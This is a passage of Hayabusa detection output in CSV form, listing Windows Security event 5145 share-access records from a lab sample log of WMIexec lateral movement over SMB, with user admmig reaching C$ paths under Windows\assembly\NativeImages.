+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.756 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.756 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.772 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.803 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.819 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.834 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.834 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.850 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.866 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.882 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.882 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.016 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.016 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.063 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.063 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.078 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 